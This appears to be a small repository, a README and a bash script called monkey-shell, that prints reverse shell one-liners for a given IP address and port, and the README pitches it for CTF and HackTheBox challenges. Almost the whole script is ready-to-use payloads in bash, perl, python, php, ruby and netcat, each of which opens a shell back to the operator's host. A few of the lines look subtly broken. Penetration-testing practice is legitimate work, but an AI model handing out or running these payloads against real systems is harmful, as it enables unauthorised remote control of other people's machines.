├── README.md
└── monkey-shell.sh


/README.md:
--------------------------------------------------------------------------------
 1 | # monkey-shell
 2 | 
 3 | This script will generate your reverse shell with proper IP address and port. Ideal for CTF and HTB challenges . Use on your own risk
 4 | 
 5 | 
 6 | ```
 7 | ./monkey-shell.sh -i <IPaddress> -p <port>
 8 | 
 9 | ```
10 | 
11 | 
12 | 


--------------------------------------------------------------------------------
/monkey-shell.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | while getopts i:p: flag
 4 | do
 5 | 	case "${flag}" in
 6 | 		i) ip_addr=${OPTARG};;
 7 | 		p) port=${OPTARG};;
 8 | 	esac
 9 | done
10 | 
11 | if [ -z "$port" ]
12 | then
13 | 	port=4444
14 | fi	
15 | 
16 | if [ -z "$ip_addr" ]
17 | then
18 | 	ip_addr="$(ip route get 1.1.1.1 | sed 's/.*src \([0-9.]\+\).*/\1/;q')"
19 | fi
20 | 
21 | echo -e "\e[41m[bash]\e[0m bash -i >& /dev/tcp/$ip_addr/$port 0>&1"
22 | echo -e "\e[41m[bash]\e[0m 0<&196;exec 196<>/dev/tcp/$ip_addr/$port; sh <&196 >&196 2>&196"
23 | echo -e "\e[41m[bash]\e[0m exec 5<>/dev/tcp/$ip_addr/$port | cat <&5 | while read line; do $line 2>&5 >&5; done"
24 | echo -e "\e[42m[perl]\e[0m perl -e 'use Socket;\$i=\"$ip_addr\";\$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"
25 | echo -e "\e[42m[perl]\e[0m perl -MIO -e '\$p=fork;exit,if(\$p);\$c=new IO::Socket::INET(PeerAddr,\"$ip_addr:$port\");STDIN->fdopen(\$c,r);$~->fdopen(\$c,w);system\$_ while<>;'"
26 | echo -e "\e[42m[perl]\e[0m\e[47m[win]\e[0m perl -MIO -e '\$c=new IO::Socket::INET(PeerAddr,\"$ip_addr:$port\");STDIN->fdopen(\$c,r);$~->fdopen(\$c,w);system\$_ while<>;'"
27 | echo -e "\e[43m[python]\e[0m python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$ip_addr\",$port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"\e[0m);'"
28 | echo -e "\e[43m[python3]\e[0m python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$ip_addr\",$port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"\e[0m);'"
29 | echo -e "\e[44m[php]\e[0m php -r '\$sock=fsockopen(\"$ip_addr\",$port);exec(\"/bin/sh -i \<\&3 \>\&3 2\>\&3\");'"
30 | echo -e "\e[45m[ruby]\e[0m ruby -rsocket -e'f=TCPSocket.open(\"$ip_addr\",$port).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'"
31 | echo -e "\e[45m[ruby]\e[0m ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"$ip_addr\",\"$port\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'"
32 | echo -e "\e[45m[ruby]\e[0m ruby -rsocket -e 'c=TCPSocket.new(\"$ip_addr\",\"$port\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'"
33 | echo -e "\e[46m[netcat]\e[0m nc -e /bin/sh $ip_addr $port"
34 | echo -e "\e[46m[netcat]\e[0m nc -e /bin/bash $ip_addr $port"
35 | echo -e "\e[46m[netcat]\e[0m nc -c /bin/sh $ip_addr $port"
36 | echo -e "\e[46m[netcat]\e[0m nc -c /bin/bash $ip_addr $port"
37 | echo -e "\e[46m[netcat]\e[0m /bin/sh | nc $ip_addr $port"
38 | echo -e "\e[46m[netcat]\e[0m rm -f /tmp/p; mknod /tmp/p p && nc $ip_addr $port 0/tmp/p"
39 | echo -e "\e[46m[netcat]\e[0m rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ip_addr $port >/tmp/f"
40 | echo -e "\e[46m[netcat]\e[0m rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc $ip_addr $port >/tmp/f"
41 | 
42 | 


--------------------------------------------------------------------------------